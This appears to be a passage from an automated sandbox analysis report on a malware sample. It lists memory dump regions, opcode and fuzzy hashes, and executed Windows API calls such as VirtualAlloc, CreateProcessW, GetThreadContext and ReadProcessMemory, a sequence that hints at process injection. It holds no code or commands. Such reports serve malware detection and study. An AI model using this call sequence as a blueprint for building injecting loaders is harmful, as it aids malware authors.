              • Opcode ID: 7583ab6dcf991f8cb20c9864550edc478e281a28bfe8c02ce868c20a5dd9bbd9
              • Instruction ID: 735bbcfc53a3ce5598202183202f639aac35c145eb819a2919281ec2c8346a02
              • Opcode Fuzzy Hash: 7583ab6dcf991f8cb20c9864550edc478e281a28bfe8c02ce868c20a5dd9bbd9
              • Instruction Fuzzy Hash: 16E0E532A19338DADB105AF998041AFB7AD97B525AF044437DD47A3304D974CC09C2D2
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
              • Instruction ID: 58a9cf0cbdee9a73fcbffde386245e7bf75bc574fd94dc9908aa1fa94fcf6ca2
              • Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
              • Instruction Fuzzy Hash: 6BF03135104644DFC306DF04D544B25FBA2FB89718F24C6ADE9890B752C337D813DA81
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745067297.0000000002D60000.00000040.00000040.sdmp, Offset: 02D60000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 8bc49b9d00c598121aaf8939c2bfab4f1fdded152098983b3098e46ef24e3d55
              • Instruction ID: e84238cf43683400e67091d8385c68d7026ba33ef06e1ac1a88bf760f2ffdef7
              • Opcode Fuzzy Hash: 8bc49b9d00c598121aaf8939c2bfab4f1fdded152098983b3098e46ef24e3d55
              • Instruction Fuzzy Hash: 90E06D76A406045BD650CF0AFC81452FBD8EB88630718C06BDC0E8B700E535B5048EA6
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 11192804267d77b063f5718e5ee3fa985ad0dc4a7a7728b163c87508e9680c22
              • Instruction ID: 5d81c060f5069012d360e9f77317630cbaf84e3e511cf3ce2c5310eddc7b1b39
              • Opcode Fuzzy Hash: 11192804267d77b063f5718e5ee3fa985ad0dc4a7a7728b163c87508e9680c22
              • Instruction Fuzzy Hash: 71E0C2704097948BC7215664A4668A17FF0BF6A708306898BE48ACBA1AC620EC05C721
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ffad36349b29458169c362bb08ce9c90de4df5e888be4dba23b3745080456225
              • Instruction ID: bda87d8d01260cba2bdb5479e366bd89da66a9a58c67dbdd18ef5e4ba50ee217
              • Opcode Fuzzy Hash: ffad36349b29458169c362bb08ce9c90de4df5e888be4dba23b3745080456225
              • Instruction Fuzzy Hash: B9D0A77244D3E08FC3151BB0181A1F53FA5DFB330A71488EED88046D22853A7997E712
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2c14169d282fddcaec8431d2c8e2b0ddf34646b0713567de1976a8727f3b8aa9
              • Instruction ID: 6946f158ed3e0fb50b38981d7a8de3db80e4a2e2dad364752c34c243c272dc6e
              • Opcode Fuzzy Hash: 2c14169d282fddcaec8431d2c8e2b0ddf34646b0713567de1976a8727f3b8aa9
              • Instruction Fuzzy Hash: D7D05E7004E3E89ED72216A458297B07F38DB2F30DF0905D7F5CA8C1A7C041D90AC792
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.744739420.0000000001202000.00000040.00000001.sdmp, Offset: 01202000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 0711734dc90c6db1f5aeff9233a20c8584dcf20a6fb366c7b3b8c6a5951d23bf
              • Instruction ID: b4c2d41b90db7f63be0bb0ed847186f894d2631c1e91639f8e84dbb6ff1e89c2
              • Opcode Fuzzy Hash: 0711734dc90c6db1f5aeff9233a20c8584dcf20a6fb366c7b3b8c6a5951d23bf
              • Instruction Fuzzy Hash: AED05E79215AA28FE3278A1CC1A8B953FE4EB51B04F4744FAE9008B6A7C369D681D200
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.744739420.0000000001202000.00000040.00000001.sdmp, Offset: 01202000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 16179fd1d395c0738f75329b5b0484beb9c166e22cb2163a105008596a837880
              • Instruction ID: c85694a1be671205184b7c9a85682b81a639fe5ae3bf946175221c8ae2da0411
              • Opcode Fuzzy Hash: 16179fd1d395c0738f75329b5b0484beb9c166e22cb2163a105008596a837880
              • Instruction Fuzzy Hash: C5D05E342102828BDB16DB0CD198F593BD4AB41B00F0644E9BE008B2A6C7B4D881C600
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 31aadd0f6f50c1c12079d81d867103a6cd43bbf1e9d55ae9e69723877bb7d04d
              • Instruction ID: d2b1750f3082f8f5d89595afc0a1258986b6189d9ffb3c81dd0f6ac7dc535bab
              • Opcode Fuzzy Hash: 31aadd0f6f50c1c12079d81d867103a6cd43bbf1e9d55ae9e69723877bb7d04d
              • Instruction Fuzzy Hash: A2D0C970200304CFCB282F70A41A41877AAAF88305B50087DD80687744DE3AE841CA44
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3cb9c39db5c8aa30c03402a0a1877881d925f3ab5612e83044c9e8235aa8aa34
              • Instruction ID: 5b07970a69baf207b16bca9bac00fd5437886fa424d0d1ce7312dcb589d086e7
              • Opcode Fuzzy Hash: 3cb9c39db5c8aa30c03402a0a1877881d925f3ab5612e83044c9e8235aa8aa34
              • Instruction Fuzzy Hash: 85B092312542180BEB60AAB67848B66338C978071DF5400A9F80CC5A00E64AE8E07240
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000013.00000002.745031876.0000000002D20000.00000040.00000001.sdmp, Offset: 02D20000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 29fb55cec8528e883eaffbdabc4885fff6d6943812c43adef34fe0d96e2c85be
              • Instruction ID: 61cfec3f5e4612246739916dcb6518da7a7a7cb3d3f66ebcc161d3957b1638ac
              • Opcode Fuzzy Hash: 29fb55cec8528e883eaffbdabc4885fff6d6943812c43adef34fe0d96e2c85be
              • Instruction Fuzzy Hash: E8C09B710462F4CFC2746A715805439721DABF130F750C439D541006258A76FC56DE55
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              APIs
                • Part of subcall function 022B126A: Sleep.KERNELBASE(?,?,034CF0BF), ref: 022B128F
              • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 022B18E7
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 022B1960
              Strings
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: AllocCreateFileSleepVirtual
              • String ID: 912b4404d7d84462b22a6b7539dd3e97
              • API String ID: 3031228858-2352350902
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 022B0A52
              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 022B0C1F
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: CreateFileFreeVirtual
              • String ID:
              • API String ID: 204039940-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
                • Part of subcall function 022B1BDE: GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 022B1BFF
              • CreateFileW.KERNELBASE(000000FF,80000000,00000007,00000000,00000003,00000080,00000000,00000000,000000FF,7F896FF1,000000FF,D6EB2188,000000FF,433A3842,000000FF,A5F15738), ref: 022B1B25
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateProcessW.KERNELBASE(?,00000000), ref: 022B05BE
              • GetThreadContext.KERNELBASE(?,00010007), ref: 022B05E1
              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 022B0605
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: Process$ContextCreateMemoryReadThread
              • String ID:
              • API String ID: 2411489757-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • GetFileAttributesW.KERNELBASE(000000FF,00000000,8A5B2944,?,00000000,000000FF,1C200000), ref: 022B1BFF
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • Sleep.KERNELBASE(?,?,034CF0BF), ref: 022B128F
              Memory Dump Source
              • Source File: 00000014.00000002.744731115.00000000022B0000.00000040.00000001.sdmp, Offset: 022B0000, based on PE: false
              Similarity
              • API ID: Sleep
              • String ID:
              • API String ID: 3472027048-0
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              Executed Functions

              Strings
              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID: $>_uq
              • API String ID: 0-2154891095
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0121AAB1
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,BF781A32,00000000,00000000,00000000,00000000), ref: 0121ABB4
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 0121AFEA
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: ConsoleCtrlHandler
              • String ID:
              • API String ID: 1513847179-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 0121AAB1
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Open
              • String ID:
              • API String ID: 71445658-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • RegQueryValueExW.KERNELBASE(?,00000E2C,BF781A32,00000000,00000000,00000000,00000000), ref: 0121ABB4
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: QueryValue
              • String ID:
              • API String ID: 3660427363-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0121A58A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121B841
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121BBB9
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DispatchMessageW.USER32(?), ref: 0121BE70
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateIconFromResourceEx.USER32 ref: 0121B78A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0121BF0C
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 0121A926
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0121BF0C
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0121A58A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DuplicateHandle
              • String ID:
              • API String ID: 3793708945-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • CreateIconFromResourceEx.USER32 ref: 0121B78A
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: CreateFromIconResource
              • String ID:
              • API String ID: 3668623891-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetConsoleCtrlHandler.KERNELBASE(?,00000E2C,?,?), ref: 0121AFEA
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: ConsoleCtrlHandler
              • String ID:
              • API String ID: 1513847179-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121BBB9
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: Initialize
              • String ID:
              • API String ID: 2538663250-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • PostMessageW.USER32(?,?,?,?), ref: 0121B841
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: MessagePost
              • String ID:
              • API String ID: 410705778-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • SetWindowLongW.USER32(?,?,?), ref: 0121A926
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: LongWindow
              • String ID:
              • API String ID: 1378638983-0
              Uniqueness

              Uniqueness Score: -1.00%

              APIs
              • DispatchMessageW.USER32(?), ref: 0121BE70
              Memory Dump Source
              • Source File: 00000016.00000002.756572018.000000000121A000.00000040.00000001.sdmp, Offset: 0121A000, based on PE: false
              Similarity
              • API ID: DispatchMessage
              • String ID:
              • API String ID: 2061451462-0
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Memory Dump Source
              • Source File: 00000016.00000002.762434886.00000000050D0000.00000040.00000001.sdmp, Offset: 050D0000, based on PE: false
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions